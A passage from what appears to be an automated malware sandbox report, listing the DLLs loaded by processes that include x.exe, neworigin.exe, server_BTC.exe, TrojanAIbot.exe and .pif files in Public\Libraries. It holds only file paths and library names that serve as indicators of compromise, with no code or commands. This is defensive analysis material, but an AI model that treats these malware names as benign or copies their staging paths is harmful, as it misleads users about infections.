Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: mpr.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: secur32.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: wldp.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: propsys.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: profapi.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: edputil.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: netutils.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: slc.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: userenv.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: sppc.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: version.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: url.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: dbghelp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: tquery.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: cryptdll.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppwmi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: slc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppcext.dll
